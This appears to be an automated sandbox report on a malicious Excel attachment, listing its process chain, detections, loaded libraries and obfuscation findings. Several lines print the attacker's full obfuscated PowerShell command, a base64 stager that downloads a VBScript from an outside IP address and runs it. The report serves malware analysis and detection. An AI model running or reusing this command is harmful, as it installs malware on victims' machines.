Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PI#0034250924.xla.xlsx	ReversingLabs: Detection: 18%
Source: PI#0034250924.xla.xlsx	Virustotal: Detection: 23%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wow64cpu.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp

Source: F7A30000.0.dr

Initial sample: OLE indicators vbamacros = False

Source: PI#0034250924.xla.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation

.NET source code contains potential unpacker

Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs	.Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs	.Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8